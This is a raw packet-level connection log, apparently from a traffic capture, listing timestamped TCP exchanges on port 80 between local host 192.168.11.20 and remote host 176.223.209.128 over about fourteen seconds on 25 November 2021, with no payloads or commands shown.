Nov 25, 2021 10:53:39.815057993 CET	80	50497	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.815068960 CET	80	50497	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.815190077 CET	50497	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.815289974 CET	50497	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.848524094 CET	80	50497	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.208625078 CET	50498	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.242158890 CET	80	50498	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.242311001 CET	50498	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.243963957 CET	50498	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.277352095 CET	80	50498	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.277597904 CET	50498	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.311127901 CET	80	50498	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.330030918 CET	80	50498	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.330085993 CET	80	50498	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.330257893 CET	50498	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.330312967 CET	50498	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.364011049 CET	80	50498	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.717874050 CET	50499	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.751332045 CET	80	50499	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.751677990 CET	50499	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.753144979 CET	50499	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.786708117 CET	80	50499	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.787024975 CET	50499	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.820575953 CET	80	50499	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.837346077 CET	80	50499	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.837394953 CET	80	50499	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:40.837596893 CET	50499	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.837646008 CET	50499	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:40.871052980 CET	80	50499	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.203422070 CET	50500	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.236551046 CET	80	50500	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.236758947 CET	50500	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.238327980 CET	50500	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.271492958 CET	80	50500	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.272005081 CET	50500	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.305299997 CET	80	50500	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.321471930 CET	80	50500	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.321518898 CET	80	50500	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.321738005 CET	50500	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.321788073 CET	50500	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.355186939 CET	80	50500	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.646378994 CET	50501	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.680131912 CET	80	50501	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.680296898 CET	50501	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.681848049 CET	50501	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.715589046 CET	80	50501	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.715867996 CET	50501	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.749835968 CET	80	50501	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.768538952 CET	80	50501	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.768594980 CET	80	50501	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:41.768738985 CET	50501	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.768795967 CET	50501	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:41.803077936 CET	80	50501	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.159387112 CET	50502	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.193489075 CET	80	50502	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.193691969 CET	50502	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.195312977 CET	50502	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.229260921 CET	80	50502	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.229437113 CET	50502	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.263555050 CET	80	50502	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.284678936 CET	80	50502	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.284742117 CET	80	50502	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.285031080 CET	50502	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.285126925 CET	50502	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.319284916 CET	80	50502	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.644224882 CET	50503	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.678428888 CET	80	50503	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.678644896 CET	50503	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.680123091 CET	50503	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.714195967 CET	80	50503	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.714409113 CET	50503	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.748490095 CET	80	50503	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.764240980 CET	80	50503	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.764292002 CET	80	50503	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:42.764389038 CET	50503	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.764442921 CET	50503	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:42.798739910 CET	80	50503	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.151931047 CET	50504	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.185340881 CET	80	50504	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.185566902 CET	50504	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.187163115 CET	50504	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.220453024 CET	80	50504	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.220664024 CET	50504	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.253962040 CET	80	50504	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.272438049 CET	80	50504	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.272485971 CET	80	50504	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.272630930 CET	50504	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.272680998 CET	50504	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.306116104 CET	80	50504	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.659718037 CET	50505	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.693893909 CET	80	50505	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.694067001 CET	50505	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.695677996 CET	50505	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.729652882 CET	80	50505	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.729818106 CET	50505	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.763768911 CET	80	50505	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.784379959 CET	80	50505	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.784427881 CET	80	50505	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:43.784637928 CET	50505	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.784686089 CET	50505	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:43.818957090 CET	80	50505	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.103144884 CET	50506	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.137207031 CET	80	50506	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.137440920 CET	50506	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.139014959 CET	50506	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.172981024 CET	80	50506	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.173232079 CET	50506	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.207257032 CET	80	50506	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.225256920 CET	80	50506	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.225322962 CET	80	50506	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.225626945 CET	50506	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.225678921 CET	50506	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.259759903 CET	80	50506	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.548943996 CET	50507	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.582154989 CET	80	50507	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.582429886 CET	50507	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.584131956 CET	50507	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.617326975 CET	80	50507	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.617490053 CET	50507	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.650790930 CET	80	50507	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.667601109 CET	80	50507	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.667627096 CET	80	50507	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:44.667830944 CET	50507	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.667855024 CET	50507	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:44.701229095 CET	80	50507	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.014828920 CET	50508	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.048841000 CET	80	50508	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.049052000 CET	50508	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.050530910 CET	50508	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.084474087 CET	80	50508	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.084681034 CET	50508	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.118566990 CET	80	50508	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.135070086 CET	80	50508	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.135094881 CET	80	50508	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.135277987 CET	50508	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.135302067 CET	50508	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.169154882 CET	80	50508	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.448432922 CET	50509	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.482430935 CET	80	50509	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.482589006 CET	50509	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.484127998 CET	50509	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.518219948 CET	80	50509	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.518430948 CET	50509	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.552558899 CET	80	50509	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.568433046 CET	80	50509	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.568496943 CET	80	50509	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.568784952 CET	50509	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.568881989 CET	50509	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.603122950 CET	80	50509	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.962457895 CET	50510	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.995908976 CET	80	50510	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:45.996198893 CET	50510	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:45.998078108 CET	50510	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.031475067 CET	80	50510	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.031735897 CET	50510	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.065154076 CET	80	50510	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.088895082 CET	80	50510	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.088958025 CET	80	50510	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.089103937 CET	50510	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.089164972 CET	50510	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.122845888 CET	80	50510	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.471167088 CET	50511	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.505341053 CET	80	50511	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.505501986 CET	50511	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.507064104 CET	50511	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.541044950 CET	80	50511	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.541218996 CET	50511	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.575359106 CET	80	50511	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.599484921 CET	80	50511	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.599534035 CET	80	50511	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.599805117 CET	50511	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.599869967 CET	50511	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:46.633965015 CET	80	50511	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:46.988003016 CET	50512	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.021388054 CET	80	50512	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.021615982 CET	50512	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.023184061 CET	50512	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.056287050 CET	80	50512	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.056586027 CET	50512	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.089886904 CET	80	50512	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.113775969 CET	80	50512	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.113832951 CET	80	50512	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.114027023 CET	50512	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.114082098 CET	50512	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.147378922 CET	80	50512	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.463435888 CET	50513	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.497519970 CET	80	50513	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.497888088 CET	50513	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.499399900 CET	50513	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.533355951 CET	80	50513	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.533529997 CET	50513	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.567635059 CET	80	50513	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.601064920 CET	80	50513	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.601129055 CET	80	50513	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.601319075 CET	50513	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.601414919 CET	50513	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.635636091 CET	80	50513	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.963592052 CET	50514	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.996962070 CET	80	50514	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:47.997245073 CET	50514	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:47.998734951 CET	50514	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.031980038 CET	80	50514	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.032182932 CET	50514	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.065685987 CET	80	50514	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.095859051 CET	80	50514	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.095972061 CET	80	50514	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.096167088 CET	50514	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.129597902 CET	80	50514	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.456119061 CET	50515	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.489528894 CET	80	50515	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.489727020 CET	50515	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.491252899 CET	50515	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.524576902 CET	80	50515	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.524857998 CET	50515	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.558337927 CET	80	50515	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.585122108 CET	80	50515	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.585177898 CET	80	50515	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.585323095 CET	50515	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.585375071 CET	50515	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:48.618928909 CET	80	50515	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:48.969049931 CET	50516	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.003283024 CET	80	50516	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.003520012 CET	50516	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.005088091 CET	50516	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.039086103 CET	80	50516	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.039268970 CET	50516	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.073244095 CET	80	50516	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.098375082 CET	80	50516	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.098423958 CET	80	50516	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.098603964 CET	50516	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.098663092 CET	50516	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.132782936 CET	80	50516	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.480756998 CET	50517	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.513863087 CET	80	50517	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.513998985 CET	50517	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.515577078 CET	50517	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.548804045 CET	80	50517	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.549032927 CET	50517	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.582457066 CET	80	50517	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.603653908 CET	80	50517	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.603725910 CET	80	50517	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.603920937 CET	50517	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.603979111 CET	50517	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.637381077 CET	80	50517	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.964451075 CET	50518	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.997857094 CET	80	50518	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:49.998033047 CET	50518	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:49.999556065 CET	50518	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.032988071 CET	80	50518	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.033163071 CET	50518	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.066325903 CET	80	50518	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.088978052 CET	80	50518	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.088995934 CET	80	50518	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.089181900 CET	50518	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.089196920 CET	50518	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.122294903 CET	80	50518	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.477468014 CET	50519	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.511610985 CET	80	50519	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.511871099 CET	50519	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.513339996 CET	50519	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.547368050 CET	80	50519	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.547584057 CET	50519	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.581619024 CET	80	50519	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.604764938 CET	80	50519	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.604816914 CET	80	50519	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.605000973 CET	50519	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.605057001 CET	50519	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:50.639148951 CET	80	50519	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:50.994606018 CET	50520	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.028682947 CET	80	50520	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.028887033 CET	50520	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.030415058 CET	50520	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.064451933 CET	80	50520	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.064649105 CET	50520	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.098831892 CET	80	50520	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.115988970 CET	80	50520	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.116045952 CET	80	50520	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.116189957 CET	50520	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.116245031 CET	50520	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.150563002 CET	80	50520	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.493801117 CET	50521	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.527945042 CET	80	50521	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.528177023 CET	50521	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.529675961 CET	50521	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.563687086 CET	80	50521	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.563894033 CET	50521	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.597984076 CET	80	50521	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.617057085 CET	80	50521	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.617106915 CET	80	50521	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.617275000 CET	50521	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.617330074 CET	50521	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:51.651314974 CET	80	50521	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:51.989356041 CET	50522	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.022803068 CET	80	50522	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.023051977 CET	50522	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.024612904 CET	50522	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.058129072 CET	80	50522	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.058469057 CET	50522	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.092056036 CET	80	50522	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.111958027 CET	80	50522	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.112006903 CET	80	50522	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.112150908 CET	50522	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.112202883 CET	50522	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.145868063 CET	80	50522	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.494899035 CET	50523	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.528620958 CET	80	50523	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.528770924 CET	50523	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.530323982 CET	50523	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.564091921 CET	80	50523	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.564259052 CET	50523	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.598128080 CET	80	50523	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.614278078 CET	80	50523	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.614289999 CET	80	50523	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.614507914 CET	50523	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.614532948 CET	50523	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.648191929 CET	80	50523	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.912676096 CET	50524	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.946444988 CET	80	50524	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.946722984 CET	50524	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.948309898 CET	50524	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:52.982279062 CET	80	50524	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:52.982491970 CET	50524	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.016551018 CET	80	50524	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.032924891 CET	80	50524	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.032984972 CET	80	50524	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.033180952 CET	50524	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.033237934 CET	50524	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.067421913 CET	80	50524	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.416640997 CET	50525	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.450716019 CET	80	50525	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.450968027 CET	50525	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.452600002 CET	50525	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.486555099 CET	80	50525	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.486818075 CET	50525	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.520931005 CET	80	50525	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.537748098 CET	80	50525	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.537796021 CET	80	50525	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:53.537952900 CET	50525	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.538002968 CET	50525	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:53.572216988 CET	80	50525	176.223.209.128	192.168.11.20
